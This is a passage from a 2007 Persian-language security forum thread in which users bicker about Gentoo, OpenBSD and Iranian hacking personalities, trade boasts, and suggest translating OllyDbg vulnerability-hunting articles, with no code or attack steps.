نیازی به این صحبتها نیست دوست من . اگه شما نصب کردن Gentoo رو سخت میدونین جای تاسف داره :13:
دوست من تا حالا هیچ وقت کار کردی با سیستم های BSD حرفه ای کار کنی !؟
من کاری ندارم شما چی کار میکنی ... چی بلدی و اصلا علاقه ای به دونستن این چیزا ندارم .:46:
ولی میتونم بهت بگم اگه شما نصب کردن Gentoo را سخت میدونی پس محاله بتونین OpenBSD نصب کنین ; )
اگه شما به تقلید از کاوه رفتین سراغ Gentoo باید بگم از خودتون نظری ندارین ...
لینوکسهای فوق العاده stable تری از اون داریم ... از جمله دبیان که از لحاظ امنیت زبان زد هستش و همچنین redhat
بد نیست بدونی من تمام تمرینات اسکپلویت نویسی رو روی کرنلهای 2.6.x.x.x. انجام میدم ; )
پس دوست خوب نیازی نیست از من سوال بپرسی ... سوال پرسیدن چیزی رو مشخص نمیکنه . سعی کن از خودت output داشته باشی .
با تفاسیری که از شما شنیدم در مورد بزرگان امنیت ایران فقط میتونم بگم شما هیچ کدوم از امنیت کاران حرفه ای ایران رو نمیشناسین ; )
من دو تا از دوستان رو فوق العاده دیدم توی مبحث امنیت .... یکی از دوستان با نام Cephexin و دیگر دوستمون Elite .
جالب اینکه بدونی من با هیچ کدوم از این دوستان ارتباط نزدیکی ندارم و فقط در حد میل با هم ارتباط داریم :20:
ولی کافیه همین دو تا اسم رو توی google سرچ کنی از این دو عزیز اطلاعاتی براتون میاد که مختون سوت میکشه .
در مورد شاهین هم اصلا صحبتی ندارم همون vampire .... چون تکلیف ایشون دیگه مشخص شده هست و فکر میکنم به اکثر دوستان دیگه ثابت شده سواد ایشون چقدر هست .... تعجب از اینکه چرا شما متوجه نشدین .
:27:
به هر حال سعی میکنم ادعایی در هیچ موقعی نداشته باشم .
و سعی میکنم با راهنمایی دوستان عزیزی که واقعا به من کمک میکنن به جای که دوست دارم برسم .
اما در مورد صحبت آخرتون ... شما به این مباحث علاقه ای ندارین ... ولی من خیلی علاقه مندم و سعی میکنم راه درست رو پیش بگیرم که حرف شما رو نزم که میگین " این کارها آخر عاقبت نداره "
من خیلی محترمانه حرف زدم ولی شما ظاهرا توپ پری دارین ... دوست ندارم صحبتهای من باعث بشه شما خدایی نکرده اخطاری دریافت کنین .
موفق باشین
به امید ایرانی امن ....

mazi_z_PSP
13-06-2007, 11:41
خوب ديگه دوستان اینجا جای این حرفا نيست.بهتره زود تر تمام بشه. يه مدت امتحان داشتم الان هم تمام شد بيشتر وقت دارم بيام . بنابر این ادامه مطالب رو ميزارم.شما هم خواهش ميکنم مطلب بزارين.و به من کمک کنين.

mazi_z_PSP
03-07-2007, 22:49
سلام دوستان.يه مدت هست نميتونم مقاله بزارم.دارم يه پروژه رو درست ميکنم.(شايد هک این سايت!!!) يکم دست به کار بشيد.کجا رفتن اونايی که کل کل ميکردن؟

v65j
04-07-2007, 23:03
Genius این elite رو خیلی خیلی خوب می شناسم از اون شبگردی های دوران قدیم بود که بکل فتوکپی نداره
بنده هم نخواستم اینجا کل را بندازم به کل از کل خوشم نمیاد دیدم این بنده خدا رو بستی به توپ گفتم یکم ترفش رو بگیرم !
راستی OpenBSd رو هم با تلاش زیاد نصب کردم قبل اون PC کار می کردم (توی دوران جوونی که حس امنیت توی رگامون بود) خیلی جالب تشریف داره بعد ها سره یه سرور مجبور شدم برم یه چیزایی از این Open و Free یاد بگیرم!
همیشه ی خدا هم با این Gentoo مشکل دارم و همیشه برای راحتی کار Pentoo رو نصب می کنم (یه آموزش کوچلو برا نصبش کنارش هست با اون خیلی راهت و با تمام اسکنر ها و .... نصب می شه)( دیگه فکر نکنم هاردم رنگی از پارتیشن های Linux ای به خودش ببینه)
راستی اون طرفی هم که آخر پست قبلی بحثش بود موش موشیه شبگرده اگه یکم فکر کنی و اون زمونا دسترسی به اون پایین پایین ها داشته بودی (اینجور که نشون می ده از اون کشته مرده هاشی مثل خودم) که حتماً داشتی میفهمی کیه ! خلاصه نه این انجمن جاشه نه به کل آخر عاقبت داره
راستی این دوستی که اینجا مقاله می زاری (صاحب خونه ) :
اگه خیلی می خوای به این دوستان خدمت کنی یه مقاله درمورد (عنوانش یه همچین چیزیه) "استفاده از OllyDB برای کشف حفره های امنیتی نرم افزار ها " رو پیدا کن و ترجمه بنما بزار همه استفاده کنن یه جا دیگه هم یه مقاله دیدم با Olly یه باگ اوور فلو رو کفش می کرد (فکر کنم توی arteam بود ) اینا بهتر از اون مطالبی می شن که شما داری بار این ملت می کنی ؛ یه چند تامقاله هم مال این شاهین و حسام هستن که فکر کنم به درد اینجا می خورن بگرد پیدا کن بزار مردم استفاده کنن
راستی __Genius__ این حسام هم کشیده کنار فکر کنم چند وقتیه میبینم داره کرک ریلیز می کنه Mfox هم یه 9 ماهی می شه نمیاد همه دارن یه جورایی می کشن کنار شمام آغازت یه پایانی داره یادش بخیر اون زمونا !!!!! (دیگه اینجا پست نمی دم خواستین چیزی درمورد اینجا یا خودم بگین PM کنین)

delta-pt
06-08-2007, 22:17
لطفآ منبع را بگید آخه خیلی تابلو است میتونید به تاپیکهای شبه سر بزنید اونجا دروس تخصصی تری درمورد هک است

mazi_z_PSP
08-08-2007, 21:37
ببخشيد دوست عزيز از اینکه منبع رو ننوشتم. چون مطالب از سايت های مختلف گلچين شده بود وقت نداشتم بنويسم.
ای بابا ما ایرانی ها ارزش این حرفا رو نداريم که دوستانه عزيز!!!!!